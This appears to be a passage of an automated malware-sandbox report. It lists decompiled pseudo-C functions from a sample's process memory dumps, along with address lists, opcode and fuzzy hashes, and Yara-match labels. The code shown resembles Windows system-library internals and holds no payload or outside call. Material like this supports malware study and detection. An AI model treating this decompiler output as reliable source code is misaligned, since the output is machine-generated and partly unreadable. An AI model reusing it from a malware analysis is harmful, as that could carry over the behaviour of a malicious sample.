				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x393d360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E0384CC50(_t86);
					L11:
					return E0388B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x3938504
				E03862280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E0388FA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E0388B0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L038677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L03864620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E0384CCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x3938504
								E0385FFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L038677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E03874F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}

0x03874bad
0x03874bbf
0x03874bc2
0x03874bc6
0x03874bcd
0x03874bd9
0x038b67fe
0x038b6800
0x03874ccc
0x03874ccd
0x03874cb7
0x03874cc9
0x03874cc9
0x03874bdf
0x03874be5
0x00000000
0x00000000
0x03874beb
0x03874bef
0x00000000
0x00000000
0x03874bf5
0x03874bf9
0x03874c06
0x03874c0b
0x03874c17
0x03874c1c
0x03874c1f
0x03874c25
0x03874c33
0x03874c3d
0x03874c40
0x03874c43
0x03874c47
0x03874c4d
0x03874c53
0x03874c54
0x03874c55
0x03874c56
0x03874c5b
0x03874c5c
0x03874c63
0x03874c6b
0x00000000
0x00000000
0x038b6776
0x038b6784
0x038b6784
0x038b679f
0x038b67a7
0x038b67af
0x038b67ce
0x00000000
0x038b67b1
0x038b67b7
0x038b67b8
0x038b67c1
0x038b67d3
0x038b67d9
0x038b67dd
0x03874c94
0x03874c94
0x03874c98
0x03874c9c
0x03874ca3
0x038b67f4
0x038b67f4
0x03874cb5
0x00000000
0x00000000
0x00000000
0x00000000
0x03874cb5
0x03874c79
0x03874c7e
0x03874c89
0x03874c8b
0x03874c8f
0x03874c8f
0x00000000
0x03874c89
0x038b67c3
0x00000000
0x038b67c3
0x038b67af
0x03874c73
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93080ad537dd7a0c1f1e067adc5be9ea472ca8a3f202f4d41fcf99355021fc5e
Instruction ID: 957661ac5ddd3f69caf6965cc2769d3f32e5ac661c8a70494b0c4b2e7969810a
Opcode Fuzzy Hash: 93080ad537dd7a0c1f1e067adc5be9ea472ca8a3f202f4d41fcf99355021fc5e
Instruction Fuzzy Hash: A4419235A4022D9BCB21DFA9C940BEAB7B9EF45710F0501E5E908EB340EB74DE84CB95

Uniqueness

Uniqueness Score: -1.00%

Function 03874D3B, Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E03874D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x393d360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E0388FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x3937bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E0388B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L038677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L03864620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E0384CCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L038677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E0388B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E0388F380(_t67 + 0xc, 0x3825138, 0x10) == 0) {
								 *0x39360d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E03874F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E03874E70(0x39386b0, 0x3875690, 0, 0) != 0) {
					_t46 = E0384CCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}

0x03874d3b
0x03874d4d
0x03874d53
0x03874d58
0x03874d65
0x03874d6c
0x03874d71
0x03874d77
0x03874d7f
0x03874d8c
0x03874d8e
0x03874dad
0x03874db0
0x03874db7
0x03874db8
0x03874db9
0x03874dba
0x03874dbb
0x03874dc1
0x03874dc8
0x03874dcc
0x03874dd5
0x03874dde
0x03874ddf
0x03874de0
0x03874de1
0x03874de6
0x03874de7
0x03874de9
0x03874df3
0x00000000
0x00000000
0x038b6c7c
0x038b6c8a
0x038b6c8a
0x038b6c9d
0x038b6ca7
0x038b6cac
0x038b6cb2
0x038b6cb9
0x00000000
0x038b6cbf
0x038b6cbf
0x00000000
0x038b6cbf
0x038b6cb9
0x03874dfb
0x038b6ccf
0x038b6cd3
0x03874e32
0x03874e39
0x038b6ce0
0x038b6cf2
0x038b6cf2
0x038b6ce0
0x03874e3f
0x03874e41
0x03874e51
0x03874e51
0x03874e03
0x03874e03
0x03874e09
0x03874e0f
0x03874e57
0x00000000
0x00000000
0x03874e1b
0x03874e30
0x03874e5b
0x03874e5b
0x00000000
0x03874e30
0x03874e11
0x03874e11
0x03874e16
0x00000000
0x03874e16
0x03874e01
0x00000000
0x03874e01
0x03874da5
0x038b6c6b
0x00000000
0x03874dab
0x03874dab
0x00000000
0x03874dab

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f246f7985bac89682dafedb7b972a4766e498af11c8dbed9981fa30145e7adb
Instruction ID: bfa29d33fd200c2dbe47327e2d602a018633b55053ed92ad4658bffe526c2540
Opcode Fuzzy Hash: 9f246f7985bac89682dafedb7b972a4766e498af11c8dbed9981fa30145e7adb
Instruction Fuzzy Hash: FC41D275A40318AFEB21DF99CC80FAAB7AAEB45624F0400D9E949DB280D774DD44CB92

Uniqueness

Uniqueness Score: -1.00%

Function 03858A0A, Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E03858A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x393d360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E0388B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E0385E9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x3821180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E03871DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E03883C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E03858999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L038677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}

0x03858a0a
0x03858a1c
0x03858a23
0x03858a2e
0x03858a30
0x03858a36
0x03858a3c
0x03858a3e
0x03858a4a
0x03858a52
0x03858a9c
0x03858aae
0x03858a58
0x03858a5e
0x03858a6a
0x03858a6f
0x03858a75
0x03858a7d
0x03858a85
0x03858a86
0x03858a89
0x03858a93
0x03858a99
0x03858a9b
0x00000000
0x03858aaf
0x03858abe
0x03858ac3
0x03858acb
0x03858ad7
0x03858ae0
0x03858af1
0x00000000
0x03858af1
0x03858acd
0x03858ad5
0x03858afb
0x03858afd
0x03858aff
0x03858b07
0x03858b22
0x03858b24
0x03858b2a
0x03858b2e
0x03858b3f
0x03858b78
0x03858b41
0x03858b52
0x03858b54
0x03858b5c
0x03858b74
0x03858b74
0x03858b5c
0x03858b3f
0x03858b5e
0x03858b61
0x03858b64
0x03858b64
0x03858b6c
0x03858b6c
0x03858b11
0x038a9cd5
0x038a9cd5
0x03858b17
0x03858b1a
0x03858b1a
0x00000000
0x03858ad5
0x03858a89

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebe61bd989dcbc11b01e636ffbe2fd93d60cb9eb2ac197deb4bed25ad1e73d67
Instruction ID: 7362d68689977089b0e26061f4125e3d42eef66f60a5a214ebe81eff71bd9a08
Opcode Fuzzy Hash: ebe61bd989dcbc11b01e636ffbe2fd93d60cb9eb2ac197deb4bed25ad1e73d67
Instruction Fuzzy Hash: 3D415EB4B4032C9BDB24DF99C888AA9B7B9EB44304F1445EAEC19D7251E7709E84CF51

Uniqueness

Uniqueness Score: -1.00%

Function 1042D7F9, Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp, Offset: 10410000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90c7b0469a9ee1051ebbb1a3f8685473a09b630616ec64e373c9f2dfe8f28651
Instruction ID: cbde0d328780fa761bf431782b614ec524de7e5d3433bbf1197c5548d7c1aff7
Opcode Fuzzy Hash: 90c7b0469a9ee1051ebbb1a3f8685473a09b630616ec64e373c9f2dfe8f28651
Instruction Fuzzy Hash: 0851D372A493D1CFE706DF68E8DA7423F72E796224B08039DCEA14B1D2C7742525CB85

Uniqueness

Uniqueness Score: -1.00%

Function 10411030, Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp, Offset: 10410000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
Instruction ID: e46dbc93b1da2e0dff615c8c6bee6c22067d8a95a4db9f8723cb886e8f6787bf
Opcode Fuzzy Hash: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
Instruction Fuzzy Hash: 78318211A596F10DD30E436D08B9675AEC18E9720174EC2FEDADB6F2F3C0888408D3A1

Uniqueness

Uniqueness Score: -1.00%

Function 038C69A6, Relevance: .1, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E038C69A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x393d360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L03856C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E038C6BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E03889980() >= 0) {
							E03862280(_t56, 0x3938778);
							_t77 = 1;
							_t68 = 1;
							if( *0x3938774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x3938774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E0384B6F0(0x382c338, 0x382c288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E03889520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E038895D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E0385FFB0(_t68, _t77, 0x3938778);
				}
				_pop(_t78);
				return E0388B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}

0x038c69b5
0x038c69be
0x038c69c3
0x038c69c9
0x038c69cc
0x038c69d1
0x038c69d3
0x038c69de
0x038c69e1
0x038c69ea
0x038c69f6
0x038c69fe
0x038c6a13
0x038c6a14
0x038c6a15
0x038c6a16
0x038c6a1e
0x038c6a26
0x038c6a31
0x038c6a36
0x038c6a37
0x038c6a40
0x038c6a49
0x038c6a4a
0x038c6a53
0x038c6a59
0x038c6a5d
0x038c6a5e
0x038c6a64
0x038c6a67
0x038c6a6a
0x038c6a6d
0x038c6a70
0x038c6a77
0x038c6a7d
0x038c6a86
0x038c6a89
0x038c6a9c
0x038c6a9f
0x038c6aa2
0x038c6aa5
0x038c6aaf
0x038c6ab1
0x038c6ab8
0x038c6ab9
0x038c6abb
0x038c6abe
0x038c6ac5
0x038c6ac5
0x038c6aaf
0x038c6a40
0x038c6a26
0x038c69fe
0x038c6ace
0x038c6ad0
0x038c6ad3
0x038c6ad8
0x038c6adf
0x038c6adf
0x038c6ae8
0x038c6aef
0x038c6aef
0x038c6af9
0x038c6b06

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11fa893f3e3066e81cdee67fd723fd8b302d54cceeb9ea6df730f1ea5ff5ba7f
Instruction ID: 6edaeea983e4916ec80da868334f4a4260352603a78bd45de761ef271543cfd1
Opcode Fuzzy Hash: 11fa893f3e3066e81cdee67fd723fd8b302d54cceeb9ea6df730f1ea5ff5ba7f
Instruction Fuzzy Hash: A3415CB1E00208AFDB14DFE9C840BBEBBF4EF48714F1881A9E915E7250EB759905CB51

Uniqueness

Uniqueness Score: -1.00%

Function 03845210, Relevance: .1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E03845210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E038452A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E038895D0();
							L038677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E0385EB70(_t54, 0x39379a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E038895D0();
								L038677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E0385EB70(_t54, 0x39379a0);
						}
						return _t52;
					}
					L5:
					_t33 = E0388F3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E0385EB70(_t54, 0x39379a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E038895D0();
							L038677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}

0x03845220
0x03845224
0x038a0d13
0x038a0d16
0x038a0d19
0x0384522a
0x0384522a
0x0384522d
0x0384522d
0x03845231
0x03845235
0x03845239
0x038a0d5c
0x038a0d62
0x00000000
0x00000000
0x038a0d6a
0x038a0d7b
0x038a0d7f
0x038a0d81
0x038a0d84
0x038a0d95
0x038a0d95
0x038a0d6c
0x038a0d71
0x038a0d71
0x038a0d9a
0x00000000
0x0384524a
0x0384524a
0x03845250
0x038a0d24
0x038a0d35
0x038a0d39
0x038a0d3b
0x038a0d3e
0x038a0d50
0x038a0d50
0x038a0d26
0x038a0d2b
0x038a0d2b
0x00000000
0x038a0d55
0x03845256
0x0384525b
0x03845265
0x038a0da7
0x0384526b
0x0384526e
0x03845272
0x038a0db1
0x038a0db4
0x038a0dc5
0x038a0dc5
0x03845272
0x03845278
0x0384527e
0x0384528a
0x0384528c
0x0384528d
0x00000000
0x03845280
0x03845282
0x03845288
0x0384529f
0x03845292
0x00000000
0x03845292
0x00000000
0x03845288
0x0384527e

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b3a26df1fe150f36eacf8b31a1fcb5235e00a136df732d78581b18cd86a4336
Instruction ID: c916f248488e631ccd6b364b3b03820d93e917d1d845bde9ac29b05fd4a2b124
Opcode Fuzzy Hash: 1b3a26df1fe150f36eacf8b31a1fcb5235e00a136df732d78581b18cd86a4336
Instruction Fuzzy Hash: CC312772641B18ABD721EFECCC80B6AB765FF01764F15479AE855CB990D730F900C691

Uniqueness

Uniqueness Score: -1.00%

Function 0387A61C, Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0387A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x3920220);
				E0389D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x3937b9c; // 0x0
				_t55 = L03864620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E0389D0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L038677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x3937b10 =  *0x3937b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x393536c;
					if( *_t51 != 0x3935368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x3935368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x393536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E0387A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}

0x0387a61c
0x0387a61e
0x0387a623
0x0387a628
0x0387a62b
0x0387a62d
0x0387a648
0x0387a64a
0x0387a64f
0x038b9b44
0x0387a6ec
0x0387a6f1
0x0387a6f1
0x0387a655
0x0387a657
0x0387a65a
0x0387a65d
0x0387a662
0x0387a663
0x0387a667
0x0387a668
0x0387a66d
0x0387a706
0x0387a706
0x038b9bda
0x038b9be6
0x038b9beb
0x00000000
0x038b9beb
0x0387a679
0x038b9b7a
0x00000000
0x038b9b7a
0x0387a683
0x0387a6f4
0x0387a6f7
0x0387a6f9
0x0387a6fd
0x0387a6a0
0x0387a6a0
0x0387a6ad
0x0387a6af
0x0387a6b4
0x038b9ba7
0x038b9bac
0x00000000
0x00000000
0x038b9bc6
0x038b9bce
0x038b9bd1
0x038b9bd3
0x038b9bd3
0x00000000
0x038b9bd1
0x0387a6bd
0x0387a6c3
0x0387a6c6
0x0387a6d2
0x0387a701
0x0387a704
0x00000000
0x0387a704
0x0387a6d4
0x0387a6d6
0x0387a6d9
0x0387a6db
0x0387a6e1
0x0387a6e6
0x0387a6e8
0x0387a6e8
0x0387a6ea
0x00000000
0x0387a6ea
0x0387a688
0x0387a692
0x0387a694
0x0387a699
0x00000000
0x00000000
0x0387a69d
0x00000000

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b30ce2af2618e19910eb7e0190dc932f592526d779505b4d59a678ee3a9e9dbb
Instruction ID: f024828963a234f39efd3a190df442886d5e12cfd73c7c38f6ca6e45329b0c8e
Opcode Fuzzy Hash: b30ce2af2618e19910eb7e0190dc932f592526d779505b4d59a678ee3a9e9dbb
Instruction Fuzzy Hash: 8D4149B5A04219DFCB18CF98C490BADBBF2BB49304F1980A9E914EF354C778E901CB50

Uniqueness

Uniqueness Score: -1.00%

